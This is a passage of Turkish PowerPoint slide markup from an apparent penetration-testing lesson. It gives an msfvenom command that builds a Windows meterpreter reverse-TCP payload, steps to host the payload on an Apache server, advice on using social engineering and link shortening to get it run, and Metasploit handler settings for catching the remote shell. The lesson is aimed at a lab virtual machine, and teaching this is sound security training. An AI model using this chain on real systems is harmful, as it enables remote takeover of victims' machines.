                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> içerisinde bulunur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> zararlı kod üretmemizi ve bu zararlı kod ile saldırdığımız sistemden ters bir bağlantı almamızı sağlayan bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>metasploit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framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> alt aracıdır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="tr-TR"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b="1" dirty="0"/>
              <a:t>Ne Yapacağız?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="İçerik Yer Tutucusu 5" descr="4 kategori için 3 serinin değerlerini gösteren kümelenmiş sütun grafik"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4121655241"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1522414" y="1700808"/>
          <a:ext cx="9144000"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b="1" dirty="0"/>
              <a:t>Zararlı Kod(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t>) Oluşturma</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="İçerik Yer Tutucusu 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522414" y="1844824"/>
            <a:ext cx="10666412" cy="4837930"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zararlı kod oluşturabilmek için </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> aracını kullanacağımızdan önceki slaytta bahsettim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -o setup.exe LHOST=10.0.2.17 LPORT=4545</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LHOST olarak kendi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Linux makinenizin ip adresini yazmanız gerekiyor. Port olarak 0-65536 arasında herhangi bir kullanılmayan portu yazabilirsiniz.(1000’in altında bir port yazarsanız dinlemek için </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yetkisi isteyecektir.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Oluşturduğumuz zararlı kodu geçen hafta öğrendiğimiz apache2 sunucumuza yerleştirelim ve linkini Windows bilgisayara gönderelim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> mv setup.exe /var/www/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cd /var/www/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</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mkdir</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setup</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> mv setup.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>setup</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> service apache2 start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://10.0.2.17/setup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> linkine gittiğimizde zararlı kodumuzu görebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="tr-TR"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972598" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> İçerisinde Bağlantıyı Yakalama</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="İçerik Yer Tutucusu 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527876" y="1844824"/>
            <a:ext cx="9679104" cy="4738538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sosyal mühendislik tekniklerini uygulayarak Windows makinesinde oluşturduğumuz zararlı kodun çalışmasını sağlayabiliriz. Link kısaltma uygulamak güçlü yöntemlerden biridir. Windows sanal makinesinde gerçek zamanlı korumayı devre dışı bırakmamız gerek. Bu yaptığımız çalışmada zararlı kodu bilgisayar algılayabilir fakat kötü niyetli bir hacker ekstra çalışmalarla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>antivirüslerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yakalayamayacağı bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oluşturabilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> kullanarak bu kod çalıştıktan sonra gelen bağlantıyı yakalayacağız ve işlemlerimize başlayacağız. Komutlarımıza başlıyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</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msfdb</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init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metasploit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databaseini</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initialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ile başlatıyoruz)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>use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multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>handler</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  (veya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>show</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options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazabilirsiniz)</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7876" y="332656"/>
            <a:ext cx="10729192" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> İçerisinde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1"/>
              <a:t>Handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0"/>
              <a:t> Ayarları</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="İçerik Yer Tutucusu 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527876" y="1844824"/>
            <a:ext cx="9679104" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> yazdıktan sonra karşımıza çıkan seçeneklerden değiştirmemiz gerekenler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, LHOST, LPORT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 10.0.2.17 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Linux IP adresini yazın)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 4545 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oluştururken kullandığınız portu yazın)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
